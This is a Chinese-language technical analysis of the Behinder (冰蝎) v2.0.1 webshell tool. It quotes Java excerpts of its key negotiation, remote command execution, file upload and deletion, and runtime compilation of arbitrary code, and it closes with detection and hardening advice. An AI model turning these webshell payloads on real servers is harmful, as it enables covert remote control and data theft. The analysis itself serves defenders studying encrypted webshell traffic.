冰蝎v2.0.1核心部分源码分析与技术解析<\/h1>

0x01 为什么要分析冰蝎<\/h2>
冰蝎是一种新型的木马连接工具，具有以下特点：<\/p>
功能强大：获取服务器信息、执行系统命令、文件管理、数据库管理、反弹meterpreter、执行自定义代码等<\/li>
流量加密：与菜刀、蚁剑相比，加密了通信流量<\/li>
检测困难：仅在初始上传和密钥协商阶段可能被检测，连接建立后WAF\/IDS\/IPS难以识别<\/li> <\/ul>
0x02 整体架构<\/h2>
冰蝎的工作流程：<\/p>
客户端请求服务端<\/li>
服务端生成128位随机数写入session并返回<\/li>
客户端重复获取key直到满足特定条件<\/li>
确定最终key并保存响应报文中的set-cookie值<\/li>
后续通信使用该key和cookie进行加密传输<\/li> <\/ol>
0x03 密钥协商机制 getKeyAndCookie<\/h2>

密钥协商流程<\/h3>
客户端调用BasicInfoUtils.getBasicInfo()<\/code><\/li>
创建ShellService<\/code>实例<\/li>
调用Utils.getKeyAndCookie()<\/code>方法<\/li>
<\/ol>
关键代码分析<\/h3>
public<\/span> static<\/span> Map<<\/span>String,<\/span> String><\/span> getKeyAndCookie<\/span>(<\/span>String getUrl,<\/span> String password,<\/span> Map<<\/span>String,<\/span> String><\/span> requestHeaders)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>    \/\/ 初始化连接
<\/span><\/span><\/span><\/span>    URL url =<\/span> new<\/span> URL(<\/span>getUrl +<\/span> "?"<\/span> +<\/span> password +<\/span> "="<\/span> +<\/span> (<\/span>new<\/span> Random()).<\/span>nextInt<\/span>(<\/span>1000<\/span>));<\/span>
<\/span><\/span>    HttpURLConnection conn =<\/span> (<\/span>HttpURLConnection)<\/span>url.<\/span>openConnection<\/span>();<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 获取初始密钥rawKey_1
<\/span><\/span><\/span><\/span>    String rawKey_1 =<\/span> sb.<\/span>toString<\/span>();<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 循环获取密钥直到满足条件
<\/span><\/span><\/span><\/span>    while<\/span>(<\/span>true<\/span>)<\/span> {<\/span>
<\/span><\/span>        Map<<\/span>String,<\/span> String><\/span> KeyAndCookie =<\/span> getRawKey(<\/span>getUrl,<\/span> password,<\/span> requestHeaders);<\/span>
<\/span><\/span>        String rawKey_2 =<\/span> (<\/span>String)<\/span>KeyAndCookie.<\/span>get<\/span>(<\/span>"key"<\/span>);<\/span>
<\/span><\/span>        byte<\/span>[]<\/span> temp =<\/span> CipherUtils.<\/span>bytesXor<\/span>(<\/span>rawKey_1.<\/span>getBytes<\/span>(),<\/span> rawKey_2.<\/span>getBytes<\/span>());<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 计算start和end索引
<\/span><\/span><\/span><\/span>        if<\/span> (<\/span>end -<\/span> start ==<\/span> 16<\/span>)<\/span> {<\/span>
<\/span><\/span>            String finalKey =<\/span> new<\/span> String(<\/span>Arrays.<\/span>copyOfRange<\/span>(<\/span>rawKey_2.<\/span>getBytes<\/span>(),<\/span> start,<\/span> end));<\/span>
<\/span><\/span>            result.<\/span>put<\/span>(<\/span>"key"<\/span>,<\/span> finalKey);<\/span>
<\/span><\/span>            return<\/span> result;<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>密钥协商特点<\/h3>

服务端木马检查pass参数，连接密码必须为"pass"<\/li>
使用多次请求获取密钥，动态控制请求次数<\/li>
最终密钥是最后一次获取的rawKey_2的一部分<\/li>
设计目的可能是绕过WAF\/NIDS的检测特征<\/li>
<\/ol>
0x04 获取服务器基本信息 getBasicInfo<\/h2>
执行流程<\/h3>

调用ShellService.getBasicInfo()<\/code><\/li>
使用Utils.getData()<\/code>加密payload<\/li>
通过Utils.requestAndParse()<\/code>发送请求<\/li>
解密并处理返回数据<\/li>
<\/ol>
关键payload分析<\/h3>
BasicInfo<\/code>类在服务端执行的核心方法：<\/p>
public<\/span> boolean<\/span> equals<\/span>(<\/span>Object obj)<\/span> {<\/span>
<\/span><\/span>    PageContext page =<\/span> (<\/span>PageContext)<\/span>obj;<\/span>
<\/span><\/span>    \/\/ 获取环境变量和系统属性
<\/span><\/span><\/span><\/span>    Map<<\/span>String,<\/span> String><\/span> env =<\/span> System.<\/span>getenv<\/span>();<\/span>
<\/span><\/span>    Properties props =<\/span> System.<\/span>getProperties<\/span>();<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 获取当前路径和驱动器列表
<\/span><\/span><\/span><\/span>    String currentPath =<\/span> (<\/span>new<\/span> File(<\/span>""<\/span>)).<\/span>getAbsolutePath<\/span>();<\/span>
<\/span><\/span>    File[]<\/span> roots =<\/span> File.<\/span>listRoots<\/span>();<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 构建返回数据
<\/span><\/span><\/span><\/span>    Map<<\/span>String,<\/span> String><\/span> entity =<\/span> new<\/span> HashMap();<\/span>
<\/span><\/span>    entity.<\/span>put<\/span>(<\/span>"basicInfo"<\/span>,<\/span> basicInfo.<\/span>toString<\/span>());<\/span>
<\/span><\/span>    entity.<\/span>put<\/span>(<\/span>"currentPath"<\/span>,<\/span> currentPath);<\/span>
<\/span><\/span>    entity.<\/span>put<\/span>(<\/span>"driveList"<\/span>,<\/span> driveList);<\/span>
<\/span><\/span>    entity.<\/span>put<\/span>(<\/span>"osInfo"<\/span>,<\/span> osInfo);<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 加密返回数据
<\/span><\/span><\/span><\/span>    String key =<\/span> page.<\/span>getSession<\/span>().<\/span>getAttribute<\/span>(<\/span>"u"<\/span>).<\/span>toString<\/span>();<\/span>
<\/span><\/span>    ServletOutputStream so =<\/span> page.<\/span>getResponse<\/span>().<\/span>getOutputStream<\/span>();<\/span>
<\/span><\/span>    so.<\/span>write<\/span>(<\/span>Encrypt(<\/span>result.<\/span>getBytes<\/span>(),<\/span> key));<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>数据传输过程<\/h3>

客户端生成payload字节数组<\/li>
AES加密+Base64编码<\/li>
服务端执行后返回加密数据<\/li>
客户端解密+Base64解码显示<\/li>
<\/ol>
0x05 命令执行功能 runCmd<\/h2>
执行流程<\/h3>

CmdUtil<\/code>调用ShellService.runCmd()<\/code><\/li>
使用Utils.getData()<\/code>获取加密payload<\/li>
通过Utils.requestAndParse()<\/code>发送请求<\/li>
解密并显示执行结果<\/li>
<\/ol>
关键payload分析<\/h3>
Cmd<\/code>类在服务端执行的核心方法：<\/p>
private<\/span> String RunCMD<\/span>(<\/span>String cmd)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>    String result =<\/span> ""<\/span>;<\/span>
<\/span><\/span>    Process p;<\/span>
<\/span><\/span>    \/\/ 区分Windows和Linux执行命令
<\/span><\/span><\/span><\/span>    if<\/span> (<\/span>System.<\/span>getProperty<\/span>(<\/span>"os.name"<\/span>).<\/span>toLowerCase<\/span>().<\/span>indexOf<\/span>(<\/span>"windows"<\/span>)<\/span> >=<\/span> 0<\/span>)<\/span> {<\/span>
<\/span><\/span>        p =<\/span> Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>new<\/span> String[]{<\/span>"cmd.exe"<\/span>,<\/span> "\/c"<\/span>,<\/span> cmd});<\/span>
<\/span><\/span>    }<\/span> else<\/span> {<\/span>
<\/span><\/span>        p =<\/span> Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>cmd);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 读取命令输出
<\/span><\/span><\/span><\/span>    BufferedReader br =<\/span> new<\/span> BufferedReader(<\/span>new<\/span> InputStreamReader(<\/span>p.<\/span>getInputStream<\/span>(),<\/span> "GB2312"<\/span>));<\/span>
<\/span><\/span>    while<\/span>((<\/span>disr =<\/span> br.<\/span>readLine<\/span>())<\/span> !=<\/span> null<\/span>)<\/span> {<\/span>
<\/span><\/span>        result =<\/span> result +<\/span> disr +<\/span> "\n"<\/span>;<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    return<\/span> result;<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>0x06 文件管理功能 FileOperation<\/h2>
主要功能<\/h3>

文件列表(list)<\/li>
文件查看(show)<\/li>
文件删除(delete)<\/li>
文件创建(create)<\/li>
目录创建(createDir)<\/li>
内容追加(append)<\/li>
文件下载(download)<\/li>
<\/ul>
关键实现<\/h3>
\/\/ 文件列表
<\/span><\/span><\/span><\/span>private<\/span> String list<\/span>(<\/span>PageContext page)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>    File f =<\/span> new<\/span> File(<\/span>path);<\/span>
<\/span><\/span>    List<<\/span>Map<<\/span>String,<\/span> String>><\/span> objArr =<\/span> new<\/span> ArrayList();<\/span>
<\/span><\/span>    if<\/span> (<\/span>f.<\/span>isDirectory<\/span>())<\/span> {<\/span>
<\/span><\/span>        for<\/span> (<\/span>File temp :<\/span> f.<\/span>listFiles<\/span>())<\/span> {<\/span>
<\/span><\/span>            Map<<\/span>String,<\/span> String><\/span> obj =<\/span> new<\/span> HashMap();<\/span>
<\/span><\/span>            obj.<\/span>put<\/span>(<\/span>"type"<\/span>,<\/span> temp.<\/span>isDirectory<\/span>()<\/span> ?<\/span> "directory"<\/span> :<\/span> "file"<\/span>);<\/span>
<\/span><\/span>            obj.<\/span>put<\/span>(<\/span>"name"<\/span>,<\/span> temp.<\/span>getName<\/span>());<\/span>
<\/span><\/span>            \/\/ 其他文件属性...
<\/span><\/span><\/span><\/span>            objArr.<\/span>add<\/span>(<\/span>obj);<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    return<\/span> this<\/span>.<\/span>buildJsonArray<\/span>(<\/span>objArr,<\/span> true<\/span>);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 文件上传
<\/span><\/span><\/span><\/span>private<\/span> String create<\/span>(<\/span>PageContext page)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>    FileOutputStream fso =<\/span> new<\/span> FileOutputStream(<\/span>path);<\/span>
<\/span><\/span>    fso.<\/span>write<\/span>((<\/span>new<\/span> BASE64Decoder()).<\/span>decodeBuffer<\/span>(<\/span>content));<\/span> \/\/ Base64解码内容
<\/span><\/span><\/span><\/span>    fso.<\/span>close<\/span>();<\/span>
<\/span><\/span>    return<\/span> path +<\/span> "上传完成，远程文件大小:"<\/span> +<\/span> (<\/span>new<\/span> File(<\/span>path)).<\/span>length<\/span>();<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>0x07 自定义代码执行 eval<\/h2>
特殊之处<\/h3>
不同于其他功能使用预定义payload，eval功能允许执行用户自定义代码：<\/p>
public<\/span> String eval<\/span>(<\/span>String sourceCode)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>    byte<\/span>[]<\/span> payload;<\/span>
<\/span><\/span>    if<\/span> (<\/span>this<\/span>.<\/span>currentType<\/span>.<\/span>equals<\/span>(<\/span>"jsp"<\/span>))<\/span> {<\/span>
<\/span><\/span>        \/\/ 动态编译用户代码
<\/span><\/span><\/span><\/span>        payload =<\/span> Utils.<\/span>getClassFromSourceCode<\/span>(<\/span>sourceCode);<\/span>
<\/span><\/span>    }<\/span> else<\/span> {<\/span>
<\/span><\/span>        payload =<\/span> sourceCode.<\/span>getBytes<\/span>();<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    byte<\/span>[]<\/span> data =<\/span> Utils.<\/span>getEvalData<\/span>(<\/span>this<\/span>.<\/span>currentKey<\/span>,<\/span> this<\/span>.<\/span>encryptType<\/span>,<\/span> this<\/span>.<\/span>currentType<\/span>,<\/span> payload);<\/span>
<\/span><\/span>    Map<<\/span>String,<\/span> Object><\/span> resultObj =<\/span> Utils.<\/span>requestAndParse<\/span>(<\/span>this<\/span>.<\/span>currentUrl<\/span>,<\/span> this<\/span>.<\/span>currentHeaders<\/span>,<\/span> data,<\/span> this<\/span>.<\/span>beginIndex<\/span>,<\/span> this<\/span>.<\/span>endIndex<\/span>);<\/span>
<\/span><\/span>    return<\/span> new<\/span> String(<\/span>resultObj.<\/span>get<\/span>(<\/span>"data"<\/span>));<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>动态编译实现<\/h3>
public<\/span> static<\/span> byte<\/span>[]<\/span> getClassFromSourceCode<\/span>(<\/span>String sourceCode)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>    \/\/ 使用JavaCompiler动态编译源代码
<\/span><\/span><\/span><\/span>    JavaCompiler jc =<\/span> ToolProvider.<\/span>getSystemJavaCompiler<\/span>();<\/span>
<\/span><\/span>    StandardJavaFileManager fileManager =<\/span> jc.<\/span>getStandardFileManager<\/span>(<\/span>null<\/span>,<\/span> null<\/span>,<\/span> null<\/span>);<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 编译选项设置为Java 1.6
<\/span><\/span><\/span><\/span>    List<<\/span>String><\/span> options =<\/span> new<\/span> ArrayList();<\/span>
<\/span><\/span>    options.<\/span>add<\/span>(<\/span>"-source"<\/span>);<\/span>
<\/span><\/span>    options.<\/span>add<\/span>(<\/span>"1.6"<\/span>);<\/span>
<\/span><\/span>    options.<\/span>add<\/span>(<\/span>"-target"<\/span>);<\/span>
<\/span><\/span>    options.<\/span>add<\/span>(<\/span>"1.6"<\/span>);<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 执行编译
<\/span><\/span><\/span><\/span>    CompilationTask cTask =<\/span> jc.<\/span>getTask<\/span>(<\/span>null<\/span>,<\/span> fileManager,<\/span> collector,<\/span> options,<\/span> null<\/span>,<\/span> Arrays.<\/span>asList<\/span>(<\/span>javaFileObject));<\/span>
<\/span><\/span>    boolean<\/span> result =<\/span> cTask.<\/span>call<\/span>();<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 获取编译后的字节码
<\/span><\/span><\/span><\/span>    JavaFileObject fileObject =<\/span> CustomClassloaderJavaFileManager.<\/span>fileObjects<\/span>.<\/span>get<\/span>(<\/span>cls);<\/span>
<\/span><\/span>    return<\/span> ((<\/span>MyJavaFileObject)<\/span>fileObject).<\/span>getCompiledBytes<\/span>();<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>0x08 防御与检测建议<\/h2>
检测思路<\/h3>


初始阶段检测<\/strong>：<\/p>

监控带有特定参数(pass)的请求<\/li>
识别多次密钥协商请求模式<\/li>
<\/ul>
<\/li>

流量特征<\/strong>：<\/p>

识别AES加密+Base64编码的数据包<\/li>
分析POST请求的Content-Type为"application\/octet-stream"<\/li>
<\/ul>
<\/li>

行为检测<\/strong>：<\/p>

监控非常规的文件操作序列<\/li>
检测动态类加载行为<\/li>
<\/ul>
<\/li>
<\/ol>
防御措施<\/h3>


服务器加固<\/strong>：<\/p>

严格限制上传文件类型和位置<\/li>
禁用不必要的Java编译功能<\/li>
<\/ul>
<\/li>

网络防护<\/strong>：<\/p>

部署能识别加密WebShell的WAF<\/li>
实施严格的出入站流量监控<\/li>
<\/ul>
<\/li>

日志分析<\/strong>：<\/p>

记录所有文件系统操作<\/li>
监控异常进程创建行为<\/li>
<\/ul>
<\/li>
<\/ol>
技术总结<\/h2>
冰蝎v2.0.1的核心技术特点：<\/p>

动态密钥协商机制增强隐蔽性<\/li>
所有通信内容AES加密+Base64编码<\/li>
使用ASM框架动态修改class文件<\/li>
支持多种功能模块的插件式扩展<\/li>
提供自定义代码执行能力<\/li>
<\/ol>
理解冰蝎的工作原理对于红队提升渗透能力，蓝队增强防御检测都具有重要意义。<\/p>